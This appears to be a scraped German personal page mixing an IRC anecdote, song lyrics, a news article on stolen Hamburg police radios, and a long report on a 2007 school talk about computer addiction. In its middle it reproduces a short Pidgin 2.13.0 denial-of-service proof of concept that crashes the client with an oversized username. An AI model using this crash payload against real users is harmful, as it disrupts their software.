Sign in | Sign up now | Forgot your password?
Privacy | Rights of the persons affected (GDPR) | About us

Sherlock Holmes - Das Geheimnis des weissen Bandes - Arthur Conan Doyle Krimi Hörpspiel

Wie man die PC Maus zum Muell bringt

Mafioso-1089717929.jpg

[14:28:52] <s0lfunk> hm
[14:43:31] <s0lfunk> Weißt Du was die Oma immer gedacht hat?
[14:43:39] <s0lfunk> Wir beerdigen am PC Mäuse
[14:43:50] <s0lfunk> Dass in der Computer Maus eine tote Maus sei
[14:44:08] <s0lfunk> Sie sagte immer: "Dass Ihr immer Mäuse beerdigt, frage ich mich"
[14:44:18] <s0lfunk> Sie wollte auch immer vom Detlef die Maus auf den Müll bringen
[14:44:26] <s0lfunk> Weil sie meinte, es stinkt nach toter Maus.
[14:45:05] <s0lfunk> Dann hat der Detlef eine Maus auseinander genommen für die Mitzi
[14:45:21] <s0lfunk> Jetzt meinte die, "Du hast sie raus geholt, ist sie im Müll bei uns aber nicht oder?"
[14:45:40] <s0lfunk> Und dann wollte sie wissen, wie das funktioniert.
[14:45:44] <s0lfunk> "Der Geist, stimmts?"
[14:45:51] <s0lfunk> schrecklich...
[14:46:54] <s0lfunk> Manchmal hat sie gesagt: "Sie will raus"
[14:47:02] <s0lfunk> Und der Detlef: "Du willst raus?"
[14:47:06] <s0lfunk> "Nein die Maus"
[14:47:43] <s0lfunk> Und dann hat sie gesagt: "Ja, wenn sie bei Gott ist"
[14:47:49] <s0lfunk> "Will und muss sie raus"
[14:49:40] <s0lfunk> Und der Detlef sagte immer: "Wie kriege ich das jetzt raus"
[14:49:52] <s0lfunk> Und dann sagte die Oma. "Ich kann Dir sagen, wo die Maus ist"
[14:50:02] <s0lfunk> Und dann sagt er manchmal: "Wo ist die Maus"
[14:50:04] <s0lfunk> usw
[14:52:16] <s0lfunk> Dann hat die Oma dem Detlef nur noch Spinnen empfohlen
[14:52:33] <s0lfunk> Da hat er sie überredet, dass da drin in Wirklichkeit eine Spinne ist
[14:52:48] <s0lfunk> Und dann wollte die Oma wissen, ob die Spinnen überhaupt so schlau sind.
[14:53:10] <s0lfunk> Einmal hat sie gesagt, der Detlef könne "den Christian" nehmen
[14:53:26] <s0lfunk> Ich soll Ihm sagen wo es ist
[14:58:48] <s0lfunk> Dann hat Ihr der Detlef es mit dem Fernsehn erklärt. Ab dann dachte sie immer in der Fernbedienung sei die "Spinne"... hm

07.06.2019: 77. Geburtstag von Detlef (plus Lisa)

monkeyisland.jpeg
Culture Beat - More & More

Wie man die PC Maus zum Muell bringt

Wenn Ich jetzt noch wüsste, wieso das Verzeichnis bei Thema 9 umbricht... ENGLISH: When I'd know, why there IS no topic number 9 steadly. Again: Bushido feat. SIDO & Kool Savas - Airplanes Remix Prod. Yungbrooke
savas_sido_16_6-1.jpg

SONG Lyrics Music Instructor Get Freaky

ed591a9c2559c022fd3e4e41a93f50001.png

Get Freaky Songtext
Freak- Freak- Frea- Frea Frea Freaky

Don't stop the dynamite

Double D yes on the fat track with the A B E guest as the fat mac
Is your hands up high in the air, shake around I can just don't care
'Cause we are the best for you with the jamin' OA we'll move you through
So move yo cross from left to right to the party rocking for the day tonight.

To the left, to the right
to the front, to the back

The super people rock your feet in every cities-blare
And just what you have master and really want to flow

A big mistake. It's much too late
The ABE control the show...

Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...

Don't stop the dynamite


Brokly makes that the young and easy make the hip dance, wack with the knees
so we take on my back down on a mission, on a mission in the track
That that ain't no competition, best they can see and i will listen
'Cause we was too just like that and now it's time for the ABE Attack

From the north, to the east
to the south, to the west

Brings that ruddy Body-Rock but dance the different Dance
Easy said and easy done, the stars themselves are ABE
From Outerspace I rock the place, from Hell the human race.

Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...

Don't stop the dynamite

Shame, shame, shame rock the body get your fame
we want more more more with your body on the floor
Shame, shame, shame rock the body get your fame
we want more more more with your body on the floor

Get freaky, get freaky, everybody in the house get freaky
From the night to the day, and day to the night
when the ABE is coming then the time is right
Get freaky, get freaky, everybody in the house get freaky
From the night to the day, and day to the night
when the ABE is coming then the time is right

Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
Get freaky, get freaky, everybody in the house get freaky
Get freaky, get freaky, everybody in the house get free...
everybody in the house get...
everybody in the house get free...

Don't stop the dynamite...

Marvin YouTuber und die Polizei

normal_wide__820x461__desktop.jpg


YouTube: YouTuber: 1, Polizei: 0
Der Hamburger Polizei wurden mehrere Funkgeräte gestohlen, die Ermittler durchsuchten auch die Räume eines bekannten YouTubers. Nun hat er sich gewehrt – auf seine Art.
Von Félice Gritti, Hamburg
5. Juni 2019, 17:13 Uhr Aktualisiert am 5. Juni 2019, 20:58 Uhr 174 Kommentare
YouTube: Der Youtuber Its Marvin zeigt in seinem Video ein Funkgerät – das gleiche Modell ist der Polizei Hamburg mehrfach abhanden gekommen.
Der Youtuber Its Marvin zeigt in seinem Video ein Funkgerät – das gleiche Modell ist der Polizei Hamburg mehrfach abhanden gekommen. © youtube.com/ItsMarvin/Screenshot

Fast war sie vergessen, die Geschichte von den gestohlenen Funkgeräten. Ende Februar war bekannt geworden, dass mehrere Geräte aus Hamburger Polizeiwachen entwendet und zum Verkauf angeboten wurden, die Staatsanwaltschaft verdächtigte zwei Polizisten und mehrere Komplizen. Der Diebstahl war brisant, mit den Geräten lässt sich der Polizeifunk abhören. Das Hamburger Abendblatt berichtete, die Hamburger Morgenpost, Spiegel Online. In manchen Berichten hieß es, angeblich sei auch ein bundesweit bekannter YouTuber in die Sache verstrickt, womöglich habe er einen Verkauf angebahnt. Dann wurde es still um den Fall.

Dass es nun plötzlich wieder laut wird, hängt mit jenem YouTuber zusammen, von dem schon Ende Februar die Rede war. Er heißt Marvin, ist 28 Jahre alt und kommt aus Nordrhein-Westfalen, seinen Nachnamen möchte er nicht nennen. Wenn er gerade keine YouTube-Videos dreht, rüstet er Einsatzfahrzeuge um, für das Rote Kreuz, das Technische Hilfswerk oder für Filmproduktionen. Er kennt sich aus mit Funkgeräten.

390.000 Abonnenten folgen seinem Youtube-Kanal "ItsMarvin". Dort veröffentlichte er am vergangenen Sonntag ein Video mit dem Titel "Polizei Hamburg vermisst Funkgeräte – HAUSDURCHSUCHUNG".  

Es sind rund zwölf Minuten, in denen Marvin erklärt, wie er die Dinge sieht. Am Ende bleiben mehr Fragen als Antworten, eines aber scheint sicher: Vergessen ist diese Geschichte nicht, zumindest nicht auf YouTube. Innerhalb von nur drei Tagen haben rund 320.000 Nutzer das Video angeklickt, knapp 1.500 von ihnen haben einen Kommentar hinterlassen. 
Elbvertiefung
Elbvertiefung – der tägliche Newsletter für Hamburg
Jeden Tag wissen, was in Hamburg wichtig ist. Relevant und prägnant. Persönlich und pointiert. Elbvertiefung ist der neue tägliche Newsletter der ZEIT für Hamburg.
Datenschutzerklärung

Die unverhoffte Aufmerksamkeit macht den Fall für die Ermittlungsbehörden noch lästiger, als er ohnehin schon ist. Wie viele Geräte abhanden gekommen sind, verriet die Hamburger Staatsanwaltschaft zwar nicht, aber offenbar sind es mehr als bislang bekannt. In den Berichten aus dem Februar war die Rede von neun Stück; die tatsächliche Zahl liege höher, sagte die Staatsanwaltschaft nun, wobei noch nicht ganz klar sei, welche gestohlen wurden und welche auf anderem Wege verloren gingen. Zudem seien auch Funkgeräte der Feuerwehr abhandengekommen. 

Mit den Geräten wurden offenbar auch die zugehörigen BSI-Karten gestohlen, die ähnlich wie SIM-Karten aussehen und den Zugang in geschützte Frequenzbereiche zulassen, also in den Polizeifunk. Nach eigenen Angaben ermittelt die Staatsanwaltschaft gegen die beiden Polizisten wegen des Verdachts des Diebstahls und gegen weitere Beschuldigte wegen des Verdachts der Hehlerei. 
Vier Geräte des YouTubers im Gesamtwert von 2.800 Euro liegen noch bei der Polizei

Auch den YouTuber Marvin besuchten die Ermittler zu Hause und durchsuchten seine Räume. Die Begegnung veranlasste ihn nun, einige Monate später, zu seinem Video. Neben vielen Vermutungen enthält es auch einen Vorwurf: Die Ermittler, sagt Marvin, hätten ihm bei der Durchsuchung mehrere Funkgeräte abgenommen und bis heute nicht zurückgegeben, obwohl sie sein rechtmäßiges Eigentum seien. Auf Anfrage der ZEIT sagt er, es handle sich um insgesamt vier Stück samt Zubehör im Gesamtwert von 2.800 Euro.

Die Durchsuchung sei zudem ein Irrtum gewesen. Auf dem Portal eBay Kleinanzeigen habe ein Nutzer sich als "Marvin aus Gladbeck" ausgegeben und zwei Funkgeräte zum Verkauf angeboten. Die Ermittler hätten fälschlicherweise den YouTuber hinter dem Inserat vermutet und die Geräte für gestohlen gehalten. Die inserierten Geräte fanden sie bei der Durchsuchung nicht, sagt Marvin, dafür aber die vier anderen, die er legal erworben habe. Allerdings gleiche das Modell den in Hamburg gestohlenen Geräten, die Ermittler hätten sie daher mitgenommen. Laut Marvin haben sie ihm inzwischen versichert, dass mit den Geräten alles in Ordnung ist. Trotzdem wartet er noch immer auf die Rückgabe, weshalb er seinen 390.000 Abonnenten nun verkündet: "Ich möchte meine Funkgeräte wiederhaben." Er sei "einfach gefrustet von der Polizeiarbeit", sagt Marvin.

Die Staatsanwaltschaft bestätigt die Durchsuchung bei dem YouTuber wegen Verdachts auf Hehlerei, lässt auf Anfrage aber offen, ob es ein Ermittlungsverfahren gegen ihn gab. Marvin selbst sagt, er habe keinen entsprechenden Bescheid erhalten. Auch zu Marvins Funkgeräten äußerte sich die Staatsanwaltschaft bislang nicht.

Unklar ist, wie viele Geräte noch immer verschollen sind. Marvin vermutet: viele. "Ich glaube, die haben noch gar keinen Überblick." Auf ihn wirken die Ermittlungen chaotisch. Die Staatsanwaltschaft schweigt bei der Frage, ob inzwischen alle Funkgeräte wieder aufgetaucht sind; aufgrund laufender Ermittlungen lasse sich dazu nichts sagen. "Das ist ein hochsensibler Bereich", sagt eine Sprecherin.

Unklar ist auch, wie groß das Risiko ist, das von dem Diebstahl ausgeht. Laut Polizei lassen sich bei gestohlenen Geräten zwar die BSI-Karten sperren, wodurch das Gerät nicht mehr am Funkverkehr teilnehmen könne. Aber was, wenn bislang niemand genau weiß, welche und wie viele Geräte gestohlen wurden – bei insgesamt 4.600 Stück in der Hamburger Polizei? 

SpaceCourt Album Sky High und Hacking Music Preview

DJSpaceCourt34.gif
https://dragonfly.it-flash.de/Sky_High-Hacking_Music-Vol1_5.zip

Pidgin und Gajim machen anscheinend Spaß.

# -*- coding: utf-8 -*-
# Exploit Title: Pidgin 2.13.0 - Denial of Service (PoC)
# Date: 24/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://pidgin.im/
# Software https://cfhcable.dl.sourceforge.net/project/pidgin/Pidgin/2.13.0/pidgin-2.13.0.exe
# Version: 2.13.0
# Tested on: Windows 7, Windows 10

# Proof of Concept:
# 1.- Run the python script 'pidgin.py', it will create a new file 'pidgin.txt'
# 2.- Open Pidgin
# 3.- Go to 'Accounts' > 'Manage Accounts'
# 4.- Click 'Add...', paste the content of pidgin.txt into the field 'Username', 
#     into the field 'Password' write anything, e.g. 1234 and click 'Add'
# 5.- On the taskbar, click show hidden icons, right click on Pingin and select 'Join Chat...'
# 6.- Now click 'Join' and crashed

buffer = "\x41" * 1000

f = open ("pidgin.txt", "w")
f.write(buffer)
f.close()

Otto Waalkes 12 11 2017 Das große Sommer Hit Festival ZDF

SIDO - Du musst auf dein Herz hören

Kim Wilde - Loved [Pulsedriver vs. Beam]

Mein Schatz Der 31 Geburtstag!

Geburtstagsgruesse.jpg
Heute: Eurodance MIX Show auf di.fm Mit allem aus meinem Forum und mehr! ;-)

<b>Madonna - Forbidden Love

Der Teufel im Kasten

Paniq - Ich mag die Drogen
[Computersucht: Wie schreibt man das?]


Paniq - Der weise

Paniq - Zum Projekt

Paniq - Und alle so: yeaah!

teaser_wide_big-2.jpg

Flyer-Text [siehe http://foerderverein-omg.de/OMG/BRENPUNKTOMG7.pdf]:

---------------------------------------

   Brennpunkt omg

   Donnerstag, 1. Maerz 2007 um 20 Uhr
  im Oskar-Maria-Graf-Gymnasium in Neufahrn, Keltenweg 5

   Computer- und Internetsucht - Verloren in virtuellen Welten? Vortrag
   mit anschliessender Diskussion

   In vielen Familien sorgt der Computer fuer Konfliktstoff. Waehrend die
   Jugendlichen selbst vom Spielen oder Surfen gar nicht genug bekommen
   kann [sic!], zeigen sich die Eltern oft verstaendnislos und machen den
   Jugendlichen Vorwuerfe: "du haengst nur noch vor dem PC und machst nix
   anderes mehr... manchmal glauben wir schon, du bist suechtig...". Da
   jugendliche Taeter Konsumenten von gewalthaltigen Computerspielen
   waren, weisen eine Reihe von Politikern, Paedagogen und
   Medienvertretern Gewaltspielen eine erhebliche (Mit-)Verantwortung an
   Vorkommnissen wie an Schulen in Erfurt oder Emsdetten zu. Immer mehr
   Menschen, insbesondere Jugendliche, verlieren sich in diesem virtuellen
   Paradies der tausend Moeglichkeiten. Hierbei ist das groesste Problem,
   dass diese doch relativ neue Suchtform noch nicht als solche anerkannt
   wird. Unter einer Computersucht versteht man den zwanghaften Drang,
   sich taeglich (moeglichst oft, meist stundenlang) mit dem Computer zu
   beschaeftigen. Die Computersucht ist einer Internetsucht oder einer
   Spielsucht (Computerspiele) aehnlich.
     * Patrick Durner - Prop e.V. Freising - Medienpaedagoge, Fachkraft
       fuer Suchtpraevention
     * Thomas Kaspar - chip.de - Chefredakteur Community bei chip.de -
       eine der groessten Websites Deutschlands


-----------------------------------

Bericht zum Vortrag von apic <apic@lehm.name>:

[Die Powerpoint-Folien zu einer aelteren Version des Vortrags scheint
 es uebrigens auf http://www.rs.mossburg.org/gesund/computersucht.ppt
 zu geben, allerdings fehlen darin einige Sachen die am 1.3. praesentiert
 wurden, z.B. diverse Videos, Websites, ...]

Ich treffe 10 Minuten verspaetet (mit Kevlarweste und mit mit Pest-
hoernchen und Chaosknoten beklebtem Laptop) in der Aula des Oh-My-
God-Gymnasiums ein und nehme relativ weit vorne (dritte Reihe oder
so) rechts Platz. Ich kriege anfangs nur GPRS und das _sehr_ laggy
und ausfallbehaftet. WLAN finde ich uebrigens leider keins - verdammt 
zurueckgeblieben diese Schule. ;-)
Irgendwann nach 10 weiteren Minuten oder so tut dann auch UMTS. Ich
versuche verzweifelt das Audiostreaming zum Rennen zu kriegen, aber das
in meinen Laptop integrierte Mikrophon ist einfach zu schlecht - man
hoert quasi nur mein Tippen gut, die Sprache des Referenten hingegen
_viel_ zu leise bis gar nicht. :-(
Ich gebe das Mitstreamen sehr schnell auf (falls es mal wieder so nen
Event gibt verpeile ich es hoffentlich nicht so sehr wie nun, _vorher_
das Hardware-Setup zu testen ;-) und entschliesse mich spontan, den
Vortrag live im IRC mitzutippen, auch wenn die Kevlar-Weste sehr
hinderlich beim Erreichen der Tasten ist und ich aufgrund der hohen
Geschwindigkeit, die ein Echtzeit-Mitschreiben erfordert, recht viele
Typos mache und laengst nicht alles 100%ig erfassen kann. Dieser Bericht
ist also in keinster Weise ein vollstaendiges Protokoll des Vortrages,
sondern enthaelt nur lueckenhafte Ausschnitte.

Ein Typ in der Reihe vor mir drehte sich uebrigens einige Zeit nach-
dem ich intensiv zu tippen begann um und fragte "Was tippen Sie da
eigentlich die ganze Zeit?". Ich erwiderte "Ich schreibe den Vortrag mit.",
woraufhin er kurz nachdachte und schliesslich fragte "Hm, das ist aber
recht nervig, nicht?", worauf ich schulterzuckend meinte "Ja.", und er
sich wieder nach vorne wandte. All zu stoerend war das Tippgeraeusch
IMHO nicht.

Am Rednertisch sitzt nur Patrick Durner; Thomas Kaspar hab ich nicht
identifizieren koennen. Moeglicherweise war das der Kasper (pun
intended ;) der das ganze 'moderiert' hat, i.e. Herrn Durner manchmal
Fragen gestellt hat und dann auch spaeter bei der Diskussionsrunde das
Mikrophon im Publikum herumreicht; aber wirklich referiert hat nur
Herr Durner.

Anfangs (also nicht ganz zu Anfang des Vortrages, sondern zu Anfang des
Teiles den ich mitgekriegt habe) geht es um die verschiedenen Typen von
Computerspielen (Actionspiele, Adventures, Strategiespiele, Sportspiele
etc.). Dann wird 'Second Life' naeher betrachtet.
Hierzu zeigt Durner eine selbst erstellte 3D-Animation auf Youtube,
die einen einsamen Computerfreak mit Sonnenbrille zeigt, der IRL im
Rollstuhl sitzt, aber in virtuellen Welten Fallschirm springt oder so.
Falls jemand das Video auf Youtube entdeckt, bitte Link schicken.

Durner erzaehlt ueber fliessende Uebergaenge aus solchen virtuellen
Welten heraus auf 'reale' Sites: "Das kommt immer mehr, dass wenn man
sich in dieser Spielwelt bewegt auf reale Homepages verlinkt wird."

[Nun habe ich einiges verpasst mitzuschreiben, z.B. ueber die virtuelle
Waehrung Linden-Dollar, die man fuer echtes Geld kaufen kann.]

"Wie gesagt ist es jetzt erstmal bisher eine den Erwachsenen vorbehaltene
Welt, aber es gibt wohl schon eine Teen-Version von Second Life. Die hab'
ich jetzt noch nicht kennengelernt. Aber auch da ist wohl einiges an Geld
zu machen."

"Gut, so viel zu den Rollenspielen."
[...]
"Es geht darum, dass man seinen Charakter ausstattet mit neuen Faehigkeiten
et cetera."
[...]
"Was in dem Film noch gut rauskam: Ich schaffe mir meine Welt. Aber ich
kann sie nicht greifen. Ich kann alles erreichen. Auch wenn ich im Roll-
stuhl sitze."
[...]
"Man muss eben sich sein Reich aufbauen. Siedler ist da ein Beispiel,
aber auch Warcraft 3 - es gibt da mittlerweile auch eine E-Sports-Liga.
Also 'E' von 'Electronic Sports'. Die ist weltweit. Es gibt aber auch
eine deutsche Liga."

Dann erzaehlt er von professionellen Spielern im asiatischen Raum, die
"60000$ im Jahr verdienen - nur mit Computerspielen - gesponsort von den
grossen Firmen.". Er zeigt als Beispiel einen mit Metal-Musik untermalten
Film, in dem zusammengeschnittene Recordings von Warcraft-3-Spielen zu
sehen sind: "Das sind eben solche Profispieler."

Rechts unten auf der Leinwand erscheint waehrend das Video laeuft ein
Rechteck mit dem Text "Inaktive Benachrichtigungssymbole werden aus-
geblendet...".

"Also wie gesagt, in Korea sind da mehrere Profispieler schon zu finden.
Es gibt dort drei Fernsehsender, die nichts anderes senden als Ueber-
tragungen von solchen Spiel-Events."

Dann erwaehnt er, dass es mittlerweile schon auch in Deutschland solche
Sender gebe, etwa 'Games TV' auf Kabel Digital, oder 'Giga'; dass diese
aber nicht so im "aktiven Spielprozess drin" seien wie in Korea.

[...]

"Dann gibt's natuerlich den grossen Sektor der Sportspiele - die meisten
ohne Altersbeschraenkung - daher sind sie bei juengeren Spielern auch
sehr beliebt. Auch dazu hammer'n Beispiel."

Er zeigt ein Recording irgend eines mir unbekannten 3D-Skateboard-Spieles.
"Also da sieht man die Grafik. Auf die Grafik wird sehr viel Wert gelegt.
Auf den Sound wird sehr viel Wert gelegt. Und auf den Realismus. Also
diese Motion-[?]-Technologie - wird erst seit 3 Jahren eingesetzt. Dass
Bewegungsablaeufe realistischer Erscheinen."

"Dann gibt es noch Puzzlespiele, Kartenspiele, Mahjong, Quizspiele,
Pokerspiele, ..."
"Natuerlich hamm unterschiedliche Spieler auch unterschiedliche
Anforderungen - dementsprechend findet jeder Spieler so seinen
Sektor wo er sich wohlfuehlt."

[...]

"Wenn die gegeneinander kaempfen, da kann wirklich ein Klick schon
das Spiel entscheiden." Das erfordere natuerlich ungemeine Konzen-
tration. "Dieses Denken" bei "diesen Aufbauspielen" bei denen man
"einen Charakter in dem ich mich wohlfuehle, in dem ich mich wieder-
finde" kreiert erforderten "Ausdauer, und eben Geduld".

Dann zeigt er eine Statistik:
Auf die Frage, wie haeufig Jugendliche den Computer als 'Spielinstrument'
benutzten, "haben 56% der Jungs geantwortet: mehrmals pro Woche. Aber nur
16% der Maedchen spielen mehrmals pro Woche. Also ist es wirklich ein
Sektor der von Jungs dominiert wird."

[...]

"Seit es Medien gibt, gibt es auch die Medienwirkungsforschung."
Schon in der Vergangenheit, z.B. als "Schundromane" bzw. "Groschenromane"
aufkamen "gab's gleichzeitig auch wieder eine Forschung die das unter-
sucht hat".

Dann erzaehlt er u.a. davon wie 'Die Leiden des jungen Werther' durch
die dadurch verursachte "Selbstmordwelle" "klar eins der besonders
hervorgetretenen Buechern in der Geschichte" gewesen sei.

"Und somit gibt's natuerlich auch heutzutage Untersuchungen, was die
Spiele beim Einzelnen bewirken. [...] Gibt es vielleicht sogar Nuzten
durch Computerspiele?"
"Weil es immer wieder von der BILD-Zeitung behauptet wird: Generell -
machen Computerspiele fett und dumm und asozial? So wird es tatsaechlich
von einem Wissenschaftler behauptet!"
"Gehen wir kurz der Frage nach... Es gibt Risikogruppen. Jugendliche
zwischen 14 und 18 Jahren sind definitiv eine Risikogruppe. Dann
Arbeitslose, Teilzeitbeschaeftigte, ... Menschen niedriger sozialer
Statusgruppen... und Menschen ohne Lebenspartner."

Als Quelle fuer diese Auflistung nennt er
http://userpage.fu-berlin.de/~ahahn/autor/charite.pdf

Daraufhin zaehlt er die Risikofaktoren auf, die auf
http://visor.unibe.ch/WS00/Internet/protokolle/internetsucht.pdf
zu finden sind. [Ich bin jetzt zu faul die an dieser Stelle
nochmal abzutippen. :-]

[...]

"Schutzfaktoren... aehm..." [Er rutscht etwas auf seinem Stuhl herum
und raeuspert sich.] "... gibt's auch."

[...]

"Das ist dieses sogenannte Suchtdreieck. Es gibt drei verursachende
Faktoren fuer die Entstehung einer Sucht. Das ist die Person selbst,
die Umwelt, und die Droge - was in dem Fall Computer und Internet
darstellt. Schuetzen kann sich jemand gegen die Droge an sich nicht.
Weil die ist [sic] existent. Die gibt's."

Bzgl. der Person gebe es mehrere 'Schutzfaktoren': "Wenn ich kommuni-
kationsfaehig bin, bin ich weniger gefaehrdet."
'Selbstwirksamkeitserwartung' helfe auch: "Ich krieg' meine Gefuehle
auch so in 'n' Griff - und benutz' einfach den Computer als Freizeit-
medium... Ein positives Selbstwertgefuehl. [...] Schutzfaktoren
auf der koerperlichen Ebene waeren z.B. Unvertraeglichkeit...
der bei zu viel Medienkonsum einfach Kopfschmerzen kriegt.
Sportlichkeit insofern, weil, aeh... wer Sport treibt, der hat
weniger Zeit... sich... aeh... vorm Rechner aufzuhalten."

[...]

"Praevention koennen Sie staerken. Die koennen Sie natuerlich auch
als Eltern staerken. [...] Umwelt, aeh, Konsum... kulturelle Faktoren.
[...] Aber das ist natuerlich kein Garant."
"Mangelnde Verfuegbarkeit, das ist durch das Internet heutzutage
eigentlich so gut wie ausgeschlossen. [...] Gutes soziales Netz.
Also wer einen funktionierenden Freundeskreis in der Realitaet hat.
Wer natuerlich seinen Freundeskreis immer mehr ins Virtuelle ver-
legt, bei dem ist dann natuerlich schon Gefahrenpotenzial da."
"Was machen Internetsuechtige hauptsaechlich? Sie spiel'n. Und
zwar nicht Online-Casino-Spiele mit hohem Geldeinsatz. Sondern
in der Regel Rollenspiele. Oder auch Shooter. Sie nutzen Kommuni-
kationssysteme: Chat, Foren, ..."
"Downloads werden auch noch genutzt. Genau! Aehm... es gibt dann
gewisse Kriterien. Wie bei jeder Sucht gibt's auch fuer die Internet-
sucht gewisse Kriterien, woran man erkennen kann dass jemand suechtig
ist.

[Es folgt ein Zitat der Praesentationsfolie, die Durner nun vortraegt,
die ihrerseits wiederum aus "Kratzer, Silvia: Pathologische Internet-
nutzung" zitiert:]

1. Beschäftigung mit dem Internet (daran denken), auch wenn man offline ist

2. Toleranzsteigerung: Immer mehr Zeit im Internet verbringen um
zufrieden zu sein

3. Unfähigkeit den Internet-Gebrauch zu kontrollieren

4. Nervosität und Reizbarkeit bei dem Versuch Internet-Gebrauch zu
reduzieren oder ganz darauf zu verzichten

5. Das Internet als Mittel/Weg um vor Problemen zu fliehen oder
schlechtes Befinden (Hilflosigkeits- oder Schuldgefühle, Angst, Depression)
zu bessern 

6. Verheimlichung des Ausmaßes der Beschäftigung mit dem Internet vor der
Familie oder Freunden

7. Gefahr oder Verlust von Arbeit, Ausbildungs- oder Karrieremöglichkeiten
oder zwischenmenschlicher Beziehungen wegen der übermäßigen Beschäftigung
mit dem Internet

8. Weiterführen der übermäßigen Beschäftigung mit dem Internet, auch wenn
negative Folgen bekannt sind

9. Entzugserscheinungen im Offline-Zustand

"Schweissausbrueche etc. Gerade bei Leuten wo was [Hardware] kaputt geht.
Und es is' Samstag oder Samstag Abend, und man kann diese Teile nicht
besorgen. Dann ist das auch Teil der Entzugserscheinungen."

10. Immer wieder länger Online bleiben als geplant

"Mindestens sechs dieser Kriterien sollten ueber einen Zeitraum von
drei Monaten vorliegen. Dann kann man von Internetsucht sprechen.
Das ist jetzt noch kein offiziell anerkanntes Instrumentarium.
Sondern ein Vorabinstrumentarium."

Inzwischen werde aber disktutiert, im "IDSM-5" [sp?] auch die
Internetsucht aufzunehmen.

Dann stellt er die 'Praevalenzraten' vor: 3-6% der Bevoelkerung
seien "als suechtig zu bezeichnen", 7-15% der Bevoelkerung "als
gefaehrdet".
"Meiner Meinung doch eine sehr grosse Zahl. Und Tendenz steigend."

[...]

Dann geht er auf die 'positiven Aspekte der Computernutzung' ein:
"Spielerisches Lernen von Wissen - sog. Edutainment-Software -
Software, bei denen [sic] man spielerisch 'was lernt - wird
befuerwortet, auch das im Kindergarten einzusetzen. Davon geht
man jetzt wieder langsam weg. Weil diese negativen Auswirkungen
eben hoeher wirken."
"Training der Hand-Auge-Koordination - wurde mal untersucht."
"Training der [sic] Problemloesedenkens."
"Training der Frustrationstoleranz und des Durchhaltevermoegens."
"Katharsis - Katharsis heisst ich kann meine Aggressionen im
Spielen loswerden. Davon geht man heute aber nicht mehr aus. Der
Effekt ist mehr Ablenkung: Weil ich mich einfach gedanklich durch
diesen Ablenkung verursachenden Faktor ablenke. Aber dass ich
aggressive Handlungen vollfuehre heisst nicht dass ich weniger
aggressiv bin."
"Kompensation."
"Kompetenz im allgemeinen Umgang mit Computern. Jemand der einen
PC, seinen PC, selber bastelt, kennt sich natuerlich auch mit dem
Medium besser aus."
"Und Sprachen lernen durch weltweite Kommunikation: [...] durch Clans
mit gemischten [internationalen] Teams."

Daraufhin praesentiert Durner ein 'Zitat aus der Medienwirkungsforschung':

"For some children, under some conditions, some television is harmful.
For other children under the same conditions, it may be beneficial.
For most children, under most conditions, most television is probably
neither harmful nor particularly beneficial."

-- Wilbur Schramm


"Zusammenfassend: Medienwirkung ist ein multifaktorieller Vorgang.
'Killerspiele machen Amoklaeufer' ist so nicht haltbar. Es braucht
mehrere Faktoren."

"Suchtgefahr existiert, aber ebenfalls nur in Verbindung mit anderen Faktoren
Computer nimmt eigenen Stellenwert in Ausbildung, Beruf und Freizeit ein"

Er erzaehlt etwas vom befuerchteten Y2K Crash, der "damals die groesste
Angst ueberhaupt" gewesen sei. "Wuerde das heute passieren, waer's
natuerlich katastrophal."

"Faszinationskraft des Mediums Computer für Jugendliche besonders groß",
da sich Dinge "in einem geschuetzten Rahmen ohne negative Folgen zu
spueren" ausprobieren liessen. "Auf lange Sicht" gaebe es allerdings
dann doch "negative Folgen".

Dann zeigt er einige Punkte, die die 'Bundespruefstelle fuer jugend-
gefaehrdende Medien' nennt, anhand deren Sucht fuer Eltern erkennbar
sei:

* Neues Spiel hat besondere Faszinationskraft
* Anfangs intensive Beschaeftigung flaut mit Bekanntheitsgrad ab
* Intensive Beschaeftigung nicht automatisch Grund zur Besorgnis
* Gesundheitliche Beeintraechtigungen (Schlafstoerungen, brennende
  Augen, Vernachlaessigung schulischer oder haeuslicher Pflichten sowie
  anderer Beduerfnisse (Sozialkontakte, Bewegung, Ernaehrung) deuten
  auf bestehende Probleme hin.

"Sozialkontakte - wenn die natuerlich nur noch virtuell existieren und
nicht mehr real, dann isses natuerlich problematisch."

Was Eltern tun koennten:
* Attraktive Alternativen zu Computer bieten
* Kreative und sportliche Hobbies foerdern
* Reale Erfahrungen ermoeglichen
* Je juenger das Kind, desto noetiger elterliche Kontrolle
* Juengere Kinder haben hoeheren Bewegungsdrang und geringere
  Konzentrationsfaehigkeit
* Spiele fuer juengere Kinder leichter zu unterbrechen
* Selbstaendigen Spielstopp bestaerken
* Zeitliche Grenzen gemeinsam vereinbaren

"Stecker ziehen ist mit das schlechteste was man machen kann."

* Bestimmte Spiele durch die Spieldynamik schweirig spontan zu
  unterbrechen
* Spielabbruch bei ungeloester Aufgabe kann gedanliche
  Weiterbeschaeftigung zur Folge habe
* Deshalb vorher gemeinsam Grenzen verienbaren, damit Kinder
  lernen rechtzeitig das Spiel zu beenden

"Man koennte z.B. vereinbaren, sagen wir... vier Stunden zu spielen...
am Wochenende...". Das Publikum bricht in schallendes Gelaechter aus.

[...]

"Da gibt's immer neue Raeume. Und neue Levels. Und da muss man das auch
vereinbaren: 'Nach dem Level ist Schluss!'"

* Spielabhaengig laengere Spielphasen ermoeglichen
"Dafuer eben seltener."

* Spielpausen bei laengeren Spielphasen vereinbaren und bestaerken,
  damit reale Aufgaben realisiert werden koennen.
"Wenn's Zimmer ausschaut wie Sau ist das natuerlich 'ne Jugendsache.
Hausaufgaben etc. sind natuerlich auch so'n Faktor."

[...]

Dann erzaehlt er von den 'sieben goldenen Regeln', die "jetzt aus
'ner Broschuere stammen":
"Ueber Drogen reden - das laesst sich natuerlich auch uebertragen
auf dieses Medium."

1. Schaffen Sie eine gute Gespraechssituation.
"Tuer auf, 'Mach das Ding aus', Tuer zu. DAS ist keine gute Gespraechs-
situation."

2. Formulieren Sie ihre eigenen Sorgen klar.
"'Mir faellt auf, dass du haeufig unausgeschlafen bist', usw."

3. Klaeren Sie die Situation, ohne "Gestaendnisse" zu erzwingen.
